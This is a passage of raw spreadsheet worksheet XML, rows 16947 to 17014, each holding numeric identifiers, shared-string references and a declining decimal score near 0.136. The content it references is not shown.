      </c>
      <c r="E16947" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16947" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="16948" ht="15.75" customHeight="1">
      <c r="A16948" s="1">
        <v>33439.0</v>
      </c>
      <c r="B16948" s="2">
        <v>7846151.0</v>
      </c>
      <c r="C16948" s="2" t="s">
        <v>16341</v>
      </c>
      <c r="D16948" s="2">
        <v>1.0</v>
      </c>
      <c r="E16948" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16948" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="16949" ht="15.75" customHeight="1">
      <c r="A16949" s="1">
        <v>22982.0</v>
      </c>
      <c r="B16949" s="2">
        <v>4930691.0</v>
      </c>
      <c r="C16949" s="2" t="s">
        <v>16342</v>
      </c>
      <c r="D16949" s="2">
        <v>1.0</v>
      </c>
      <c r="E16949" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16949" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="16950" ht="15.75" customHeight="1">
      <c r="A16950" s="1">
        <v>23024.0</v>
      </c>
      <c r="B16950" s="2">
        <v>4998249.0</v>
      </c>
      <c r="C16950" s="2" t="s">
        <v>16277</v>
      </c>
      <c r="D16950" s="2">
        <v>1.0</v>
      </c>
      <c r="E16950" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16950" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="16951" ht="15.75" customHeight="1">
      <c r="A16951" s="1">
        <v>27719.0</v>
      </c>
      <c r="B16951" s="2">
        <v>2.3061455E7</v>
      </c>
      <c r="C16951" s="2" t="s">
        <v>16343</v>
      </c>
      <c r="D16951" s="2">
        <v>1.0</v>
      </c>
      <c r="E16951" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16951" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="16952" ht="15.75" customHeight="1">
      <c r="A16952" s="1">
        <v>5005.0</v>
      </c>
      <c r="B16952" s="2">
        <v>4.418337E7</v>
      </c>
      <c r="C16952" s="2" t="s">
        <v>16344</v>
      </c>
      <c r="D16952" s="2">
        <v>1.0</v>
      </c>
      <c r="E16952" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16952" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="16953" ht="15.75" customHeight="1">
      <c r="A16953" s="1">
        <v>27623.0</v>
      </c>
      <c r="B16953" s="2">
        <v>2.2686181E7</v>
      </c>
      <c r="C16953" s="2" t="s">
        <v>16345</v>
      </c>
      <c r="D16953" s="2">
        <v>1.0</v>
      </c>
      <c r="E16953" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16953" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="16954" ht="15.75" customHeight="1">
      <c r="A16954" s="1">
        <v>30705.0</v>
      </c>
      <c r="B16954" s="2">
        <v>4273627.0</v>
      </c>
      <c r="C16954" s="2" t="s">
        <v>16346</v>
      </c>
      <c r="D16954" s="2">
        <v>1.0</v>
      </c>
      <c r="E16954" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16954" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="16955" ht="15.75" customHeight="1">
      <c r="A16955" s="1">
        <v>5587.0</v>
      </c>
      <c r="B16955" s="2">
        <v>4.6084877E7</v>
      </c>
      <c r="C16955" s="2" t="s">
        <v>16347</v>
      </c>
      <c r="D16955" s="2">
        <v>1.0</v>
      </c>
      <c r="E16955" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16955" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="16956" ht="15.75" customHeight="1">
      <c r="A16956" s="1">
        <v>24438.0</v>
      </c>
      <c r="B16956" s="2">
        <v>1.0894565E7</v>
      </c>
      <c r="C16956" s="2" t="s">
        <v>16348</v>
      </c>
      <c r="D16956" s="2">
        <v>1.0</v>
      </c>
      <c r="E16956" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16956" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="16957" ht="15.75" customHeight="1">
      <c r="A16957" s="1">
        <v>18233.0</v>
      </c>
      <c r="B16957" s="2">
        <v>5.2108671E7</v>
      </c>
      <c r="C16957" s="2" t="s">
        <v>16349</v>
      </c>
      <c r="D16957" s="2">
        <v>1.0</v>
      </c>
      <c r="E16957" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16957" s="2">
        <v>0.1366843033509701</v>
      </c>
    </row>
    <row r="16958" ht="15.75" customHeight="1">
      <c r="A16958" s="1">
        <v>1791.0</v>
      </c>
      <c r="B16958" s="2">
        <v>2911432.0</v>
      </c>
      <c r="C16958" s="2" t="s">
        <v>16350</v>
      </c>
      <c r="D16958" s="2">
        <v>1.0</v>
      </c>
      <c r="E16958" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16958" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="16959" ht="15.75" customHeight="1">
      <c r="A16959" s="1">
        <v>2250.0</v>
      </c>
      <c r="B16959" s="2">
        <v>3.2356581E7</v>
      </c>
      <c r="C16959" s="2" t="s">
        <v>16351</v>
      </c>
      <c r="D16959" s="2">
        <v>1.0</v>
      </c>
      <c r="E16959" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16959" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="16960" ht="15.75" customHeight="1">
      <c r="A16960" s="1">
        <v>5384.0</v>
      </c>
      <c r="B16960" s="2">
        <v>4.5418985E7</v>
      </c>
      <c r="C16960" s="2" t="s">
        <v>16352</v>
      </c>
      <c r="D16960" s="2">
        <v>1.0</v>
      </c>
      <c r="E16960" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16960" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="16961" ht="15.75" customHeight="1">
      <c r="A16961" s="1">
        <v>24231.0</v>
      </c>
      <c r="B16961" s="2">
        <v>1.0460001E7</v>
      </c>
      <c r="C16961" s="2" t="s">
        <v>16353</v>
      </c>
      <c r="D16961" s="2">
        <v>1.0</v>
      </c>
      <c r="E16961" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16961" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="16962" ht="15.75" customHeight="1">
      <c r="A16962" s="1">
        <v>28382.0</v>
      </c>
      <c r="B16962" s="2">
        <v>2.6111584E7</v>
      </c>
      <c r="C16962" s="2" t="s">
        <v>16354</v>
      </c>
      <c r="D16962" s="2">
        <v>1.0</v>
      </c>
      <c r="E16962" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16962" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="16963" ht="15.75" customHeight="1">
      <c r="A16963" s="1">
        <v>26170.0</v>
      </c>
      <c r="B16963" s="2">
        <v>1.6131679E7</v>
      </c>
      <c r="C16963" s="2" t="s">
        <v>16355</v>
      </c>
      <c r="D16963" s="2">
        <v>1.0</v>
      </c>
      <c r="E16963" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16963" s="2">
        <v>0.1364379084967321</v>
      </c>
    </row>
    <row r="16964" ht="15.75" customHeight="1">
      <c r="A16964" s="1">
        <v>24892.0</v>
      </c>
      <c r="B16964" s="2">
        <v>1.2270473E7</v>
      </c>
      <c r="C16964" s="2" t="s">
        <v>16356</v>
      </c>
      <c r="D16964" s="2">
        <v>1.0</v>
      </c>
      <c r="E16964" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16964" s="2">
        <v>0.1363636363636363</v>
      </c>
    </row>
    <row r="16965" ht="15.75" customHeight="1">
      <c r="A16965" s="1">
        <v>33983.0</v>
      </c>
      <c r="B16965" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C16965" s="2" t="s">
        <v>16357</v>
      </c>
      <c r="D16965" s="2">
        <v>1.0</v>
      </c>
      <c r="E16965" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16965" s="2">
        <v>0.1363636363636363</v>
      </c>
    </row>
    <row r="16966" ht="15.75" customHeight="1">
      <c r="A16966" s="1">
        <v>28661.0</v>
      </c>
      <c r="B16966" s="2">
        <v>2.7417014E7</v>
      </c>
      <c r="C16966" s="2" t="s">
        <v>16358</v>
      </c>
      <c r="D16966" s="2">
        <v>1.0</v>
      </c>
      <c r="E16966" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16966" s="2">
        <v>0.1362252663622527</v>
      </c>
    </row>
    <row r="16967" ht="15.75" customHeight="1">
      <c r="A16967" s="1">
        <v>31614.0</v>
      </c>
      <c r="B16967" s="2">
        <v>5143743.0</v>
      </c>
      <c r="C16967" s="2" t="s">
        <v>16359</v>
      </c>
      <c r="D16967" s="2">
        <v>1.0</v>
      </c>
      <c r="E16967" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16967" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="16968" ht="15.75" customHeight="1">
      <c r="A16968" s="1">
        <v>656.0</v>
      </c>
      <c r="B16968" s="2">
        <v>2.0002459E7</v>
      </c>
      <c r="C16968" s="2" t="s">
        <v>16360</v>
      </c>
      <c r="D16968" s="2">
        <v>1.0</v>
      </c>
      <c r="E16968" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16968" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16969" ht="15.75" customHeight="1">
      <c r="A16969" s="1">
        <v>697.0</v>
      </c>
      <c r="B16969" s="2">
        <v>2.0453149E7</v>
      </c>
      <c r="C16969" s="2" t="s">
        <v>16361</v>
      </c>
      <c r="D16969" s="2">
        <v>1.0</v>
      </c>
      <c r="E16969" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16969" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16970" ht="15.75" customHeight="1">
      <c r="A16970" s="1">
        <v>4618.0</v>
      </c>
      <c r="B16970" s="2">
        <v>4.296391E7</v>
      </c>
      <c r="C16970" s="2" t="s">
        <v>16362</v>
      </c>
      <c r="D16970" s="2">
        <v>1.0</v>
      </c>
      <c r="E16970" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16970" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16971" ht="15.75" customHeight="1">
      <c r="A16971" s="1">
        <v>7098.0</v>
      </c>
      <c r="B16971" s="2">
        <v>5.0344047E7</v>
      </c>
      <c r="C16971" s="2" t="s">
        <v>16363</v>
      </c>
      <c r="D16971" s="2">
        <v>1.0</v>
      </c>
      <c r="E16971" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16971" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16972" ht="15.75" customHeight="1">
      <c r="A16972" s="1">
        <v>10067.0</v>
      </c>
      <c r="B16972" s="2">
        <v>5.7141524E7</v>
      </c>
      <c r="C16972" s="2" t="s">
        <v>16364</v>
      </c>
      <c r="D16972" s="2">
        <v>1.0</v>
      </c>
      <c r="E16972" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16972" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16973" ht="15.75" customHeight="1">
      <c r="A16973" s="1">
        <v>10849.0</v>
      </c>
      <c r="B16973" s="2">
        <v>1.6180135E7</v>
      </c>
      <c r="C16973" s="2" t="s">
        <v>16365</v>
      </c>
      <c r="D16973" s="2">
        <v>1.0</v>
      </c>
      <c r="E16973" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16973" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16974" ht="15.75" customHeight="1">
      <c r="A16974" s="1">
        <v>11260.0</v>
      </c>
      <c r="B16974" s="2">
        <v>2.0646134E7</v>
      </c>
      <c r="C16974" s="2" t="s">
        <v>16366</v>
      </c>
      <c r="D16974" s="2">
        <v>1.0</v>
      </c>
      <c r="E16974" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16974" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16975" ht="15.75" customHeight="1">
      <c r="A16975" s="1">
        <v>20635.0</v>
      </c>
      <c r="B16975" s="2">
        <v>1.4166603E7</v>
      </c>
      <c r="C16975" s="2" t="s">
        <v>16367</v>
      </c>
      <c r="D16975" s="2">
        <v>1.0</v>
      </c>
      <c r="E16975" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16975" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16976" ht="15.75" customHeight="1">
      <c r="A16976" s="1">
        <v>21220.0</v>
      </c>
      <c r="B16976" s="2">
        <v>1.9592771E7</v>
      </c>
      <c r="C16976" s="2" t="s">
        <v>16368</v>
      </c>
      <c r="D16976" s="2">
        <v>1.0</v>
      </c>
      <c r="E16976" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16976" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16977" ht="15.75" customHeight="1">
      <c r="A16977" s="1">
        <v>23409.0</v>
      </c>
      <c r="B16977" s="2">
        <v>5.5948392E7</v>
      </c>
      <c r="C16977" s="2" t="s">
        <v>16369</v>
      </c>
      <c r="D16977" s="2">
        <v>1.0</v>
      </c>
      <c r="E16977" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16977" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16978" ht="15.75" customHeight="1">
      <c r="A16978" s="1">
        <v>25743.0</v>
      </c>
      <c r="B16978" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C16978" s="2" t="s">
        <v>16370</v>
      </c>
      <c r="D16978" s="2">
        <v>1.0</v>
      </c>
      <c r="E16978" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16978" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16979" ht="15.75" customHeight="1">
      <c r="A16979" s="1">
        <v>26774.0</v>
      </c>
      <c r="B16979" s="2">
        <v>1.849415E7</v>
      </c>
      <c r="C16979" s="2" t="s">
        <v>16371</v>
      </c>
      <c r="D16979" s="2">
        <v>1.0</v>
      </c>
      <c r="E16979" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16979" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16980" ht="15.75" customHeight="1">
      <c r="A16980" s="1">
        <v>27767.0</v>
      </c>
      <c r="B16980" s="2">
        <v>2.3110234E7</v>
      </c>
      <c r="C16980" s="2" t="s">
        <v>16372</v>
      </c>
      <c r="D16980" s="2">
        <v>1.0</v>
      </c>
      <c r="E16980" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16980" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16981" ht="15.75" customHeight="1">
      <c r="A16981" s="1">
        <v>32642.0</v>
      </c>
      <c r="B16981" s="2">
        <v>5857973.0</v>
      </c>
      <c r="C16981" s="2" t="s">
        <v>16373</v>
      </c>
      <c r="D16981" s="2">
        <v>1.0</v>
      </c>
      <c r="E16981" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16981" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16982" ht="15.75" customHeight="1">
      <c r="A16982" s="1">
        <v>32700.0</v>
      </c>
      <c r="B16982" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C16982" s="2" t="s">
        <v>16374</v>
      </c>
      <c r="D16982" s="2">
        <v>1.0</v>
      </c>
      <c r="E16982" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16982" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="16983" ht="15.75" customHeight="1">
      <c r="A16983" s="1">
        <v>13182.0</v>
      </c>
      <c r="B16983" s="2">
        <v>3.4041417E7</v>
      </c>
      <c r="C16983" s="2" t="s">
        <v>16375</v>
      </c>
      <c r="D16983" s="2">
        <v>1.0</v>
      </c>
      <c r="E16983" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16983" s="2">
        <v>0.1359126984126984</v>
      </c>
    </row>
    <row r="16984" ht="15.75" customHeight="1">
      <c r="A16984" s="1">
        <v>2577.0</v>
      </c>
      <c r="B16984" s="2">
        <v>3.4285742E7</v>
      </c>
      <c r="C16984" s="2" t="s">
        <v>16376</v>
      </c>
      <c r="D16984" s="2">
        <v>1.0</v>
      </c>
      <c r="E16984" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16984" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="16985" ht="15.75" customHeight="1">
      <c r="A16985" s="1">
        <v>20858.0</v>
      </c>
      <c r="B16985" s="2">
        <v>1.5796724E7</v>
      </c>
      <c r="C16985" s="2" t="s">
        <v>16377</v>
      </c>
      <c r="D16985" s="2">
        <v>1.0</v>
      </c>
      <c r="E16985" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16985" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="16986" ht="15.75" customHeight="1">
      <c r="A16986" s="1">
        <v>23687.0</v>
      </c>
      <c r="B16986" s="2">
        <v>7004134.0</v>
      </c>
      <c r="C16986" s="2" t="s">
        <v>16255</v>
      </c>
      <c r="D16986" s="2">
        <v>1.0</v>
      </c>
      <c r="E16986" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16986" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="16987" ht="15.75" customHeight="1">
      <c r="A16987" s="1">
        <v>24378.0</v>
      </c>
      <c r="B16987" s="2">
        <v>1.0767649E7</v>
      </c>
      <c r="C16987" s="2" t="s">
        <v>16339</v>
      </c>
      <c r="D16987" s="2">
        <v>1.0</v>
      </c>
      <c r="E16987" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16987" s="2">
        <v>0.1355218855218856</v>
      </c>
    </row>
    <row r="16988" ht="15.75" customHeight="1">
      <c r="A16988" s="1">
        <v>30346.0</v>
      </c>
      <c r="B16988" s="2">
        <v>3.822138E7</v>
      </c>
      <c r="C16988" s="2" t="s">
        <v>16378</v>
      </c>
      <c r="D16988" s="2">
        <v>1.0</v>
      </c>
      <c r="E16988" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16988" s="2">
        <v>0.1355218855218855</v>
      </c>
    </row>
    <row r="16989" ht="15.75" customHeight="1">
      <c r="A16989" s="1">
        <v>15044.0</v>
      </c>
      <c r="B16989" s="2">
        <v>4.1597026E7</v>
      </c>
      <c r="C16989" s="2" t="s">
        <v>16379</v>
      </c>
      <c r="D16989" s="2">
        <v>1.0</v>
      </c>
      <c r="E16989" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16989" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="16990" ht="15.75" customHeight="1">
      <c r="A16990" s="1">
        <v>32010.0</v>
      </c>
      <c r="B16990" s="2">
        <v>5.3453089E7</v>
      </c>
      <c r="C16990" s="2" t="s">
        <v>16380</v>
      </c>
      <c r="D16990" s="2">
        <v>1.0</v>
      </c>
      <c r="E16990" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16990" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="16991" ht="15.75" customHeight="1">
      <c r="A16991" s="1">
        <v>299.0</v>
      </c>
      <c r="B16991" s="2">
        <v>1.5508655E7</v>
      </c>
      <c r="C16991" s="2" t="s">
        <v>16381</v>
      </c>
      <c r="D16991" s="2">
        <v>1.0</v>
      </c>
      <c r="E16991" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16991" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="16992" ht="15.75" customHeight="1">
      <c r="A16992" s="1">
        <v>333.0</v>
      </c>
      <c r="B16992" s="2">
        <v>1.581964E7</v>
      </c>
      <c r="C16992" s="2" t="s">
        <v>16382</v>
      </c>
      <c r="D16992" s="2">
        <v>1.0</v>
      </c>
      <c r="E16992" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16992" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="16993" ht="15.75" customHeight="1">
      <c r="A16993" s="1">
        <v>10754.0</v>
      </c>
      <c r="B16993" s="2">
        <v>1.5509227E7</v>
      </c>
      <c r="C16993" s="2" t="s">
        <v>16383</v>
      </c>
      <c r="D16993" s="2">
        <v>1.0</v>
      </c>
      <c r="E16993" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16993" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="16994" ht="15.75" customHeight="1">
      <c r="A16994" s="1">
        <v>11435.0</v>
      </c>
      <c r="B16994" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C16994" s="2" t="s">
        <v>16384</v>
      </c>
      <c r="D16994" s="2">
        <v>1.0</v>
      </c>
      <c r="E16994" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16994" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="16995" ht="15.75" customHeight="1">
      <c r="A16995" s="1">
        <v>12616.0</v>
      </c>
      <c r="B16995" s="2">
        <v>3.0204408E7</v>
      </c>
      <c r="C16995" s="2" t="s">
        <v>16385</v>
      </c>
      <c r="D16995" s="2">
        <v>1.0</v>
      </c>
      <c r="E16995" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16995" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="16996" ht="15.75" customHeight="1">
      <c r="A16996" s="1">
        <v>12819.0</v>
      </c>
      <c r="B16996" s="2">
        <v>3.1607367E7</v>
      </c>
      <c r="C16996" s="2" t="s">
        <v>16386</v>
      </c>
      <c r="D16996" s="2">
        <v>1.0</v>
      </c>
      <c r="E16996" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16996" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="16997" ht="15.75" customHeight="1">
      <c r="A16997" s="1">
        <v>15769.0</v>
      </c>
      <c r="B16997" s="2">
        <v>4.4181586E7</v>
      </c>
      <c r="C16997" s="2" t="s">
        <v>16387</v>
      </c>
      <c r="D16997" s="2">
        <v>1.0</v>
      </c>
      <c r="E16997" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16997" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="16998" ht="15.75" customHeight="1">
      <c r="A16998" s="1">
        <v>16198.0</v>
      </c>
      <c r="B16998" s="2">
        <v>4.5661419E7</v>
      </c>
      <c r="C16998" s="2" t="s">
        <v>16388</v>
      </c>
      <c r="D16998" s="2">
        <v>1.0</v>
      </c>
      <c r="E16998" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16998" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="16999" ht="15.75" customHeight="1">
      <c r="A16999" s="1">
        <v>20263.0</v>
      </c>
      <c r="B16999" s="2">
        <v>1.1067247E7</v>
      </c>
      <c r="C16999" s="2" t="s">
        <v>16389</v>
      </c>
      <c r="D16999" s="2">
        <v>1.0</v>
      </c>
      <c r="E16999" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16999" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17000" ht="15.75" customHeight="1">
      <c r="A17000" s="1">
        <v>20361.0</v>
      </c>
      <c r="B17000" s="2">
        <v>1.1722509E7</v>
      </c>
      <c r="C17000" s="2" t="s">
        <v>16390</v>
      </c>
      <c r="D17000" s="2">
        <v>1.0</v>
      </c>
      <c r="E17000" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17000" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17001" ht="15.75" customHeight="1">
      <c r="A17001" s="1">
        <v>21906.0</v>
      </c>
      <c r="B17001" s="2">
        <v>2.8075897E7</v>
      </c>
      <c r="C17001" s="2" t="s">
        <v>16391</v>
      </c>
      <c r="D17001" s="2">
        <v>1.0</v>
      </c>
      <c r="E17001" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17001" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17002" ht="15.75" customHeight="1">
      <c r="A17002" s="1">
        <v>23158.0</v>
      </c>
      <c r="B17002" s="2">
        <v>5191688.0</v>
      </c>
      <c r="C17002" s="2" t="s">
        <v>16392</v>
      </c>
      <c r="D17002" s="2">
        <v>1.0</v>
      </c>
      <c r="E17002" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17002" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17003" ht="15.75" customHeight="1">
      <c r="A17003" s="1">
        <v>25354.0</v>
      </c>
      <c r="B17003" s="2">
        <v>1.3553041E7</v>
      </c>
      <c r="C17003" s="2" t="s">
        <v>16393</v>
      </c>
      <c r="D17003" s="2">
        <v>1.0</v>
      </c>
      <c r="E17003" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17003" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17004" ht="15.75" customHeight="1">
      <c r="A17004" s="1">
        <v>25361.0</v>
      </c>
      <c r="B17004" s="2">
        <v>1.3592787E7</v>
      </c>
      <c r="C17004" s="2" t="s">
        <v>16394</v>
      </c>
      <c r="D17004" s="2">
        <v>1.0</v>
      </c>
      <c r="E17004" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17004" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17005" ht="15.75" customHeight="1">
      <c r="A17005" s="1">
        <v>25774.0</v>
      </c>
      <c r="B17005" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C17005" s="2" t="s">
        <v>16395</v>
      </c>
      <c r="D17005" s="2">
        <v>1.0</v>
      </c>
      <c r="E17005" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17005" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17006" ht="15.75" customHeight="1">
      <c r="A17006" s="1">
        <v>30060.0</v>
      </c>
      <c r="B17006" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C17006" s="2" t="s">
        <v>16396</v>
      </c>
      <c r="D17006" s="2">
        <v>1.0</v>
      </c>
      <c r="E17006" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17006" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17007" ht="15.75" customHeight="1">
      <c r="A17007" s="1">
        <v>30466.0</v>
      </c>
      <c r="B17007" s="2">
        <v>3.9497152E7</v>
      </c>
      <c r="C17007" s="2" t="s">
        <v>16397</v>
      </c>
      <c r="D17007" s="2">
        <v>1.0</v>
      </c>
      <c r="E17007" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17007" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17008" ht="15.75" customHeight="1">
      <c r="A17008" s="1">
        <v>31138.0</v>
      </c>
      <c r="B17008" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C17008" s="2" t="s">
        <v>16398</v>
      </c>
      <c r="D17008" s="2">
        <v>1.0</v>
      </c>
      <c r="E17008" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17008" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17009" ht="15.75" customHeight="1">
      <c r="A17009" s="1">
        <v>31688.0</v>
      </c>
      <c r="B17009" s="2">
        <v>5191687.0</v>
      </c>
      <c r="C17009" s="2" t="s">
        <v>16392</v>
      </c>
      <c r="D17009" s="2">
        <v>1.0</v>
      </c>
      <c r="E17009" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17009" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17010" ht="15.75" customHeight="1">
      <c r="A17010" s="1">
        <v>31732.0</v>
      </c>
      <c r="B17010" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C17010" s="2" t="s">
        <v>16399</v>
      </c>
      <c r="D17010" s="2">
        <v>1.0</v>
      </c>
      <c r="E17010" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17010" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="17011" ht="15.75" customHeight="1">
      <c r="A17011" s="1">
        <v>7895.0</v>
      </c>
      <c r="B17011" s="2">
        <v>5.2443149E7</v>
      </c>
      <c r="C17011" s="2" t="s">
        <v>16400</v>
      </c>
      <c r="D17011" s="2">
        <v>1.0</v>
      </c>
      <c r="E17011" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17011" s="2">
        <v>0.1351165980795611</v>
      </c>
    </row>
    <row r="17012" ht="15.75" customHeight="1">
      <c r="A17012" s="1">
        <v>27189.0</v>
      </c>
      <c r="B17012" s="2">
        <v>2.089392E7</v>
      </c>
      <c r="C17012" s="2" t="s">
        <v>16401</v>
      </c>
      <c r="D17012" s="2">
        <v>1.0</v>
      </c>
      <c r="E17012" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17012" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="17013" ht="15.75" customHeight="1">
      <c r="A17013" s="1">
        <v>10244.0</v>
      </c>
      <c r="B17013" s="2">
        <v>5.7535705E7</v>
      </c>
      <c r="C17013" s="2" t="s">
        <v>16402</v>
      </c>
      <c r="D17013" s="2">
        <v>1.0</v>
      </c>
      <c r="E17013" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17013" s="2">
        <v>0.134920634920635</v>
      </c>
    </row>
    <row r="17014" ht="15.75" customHeight="1">
      <c r="A17014" s="1">
        <v>12892.0</v>
      </c>
      <c r="B17014" s="2">
        <v>3.2053688E7</v>
      </c>
      <c r="C17014" s="2" t="s">
        <v>16403</v>
      </c>
      <c r="D17014" s="2">
        <v>1.0</v>
      </c>
      <c r="E17014" s="3" t="s">
        <v>15755</v>
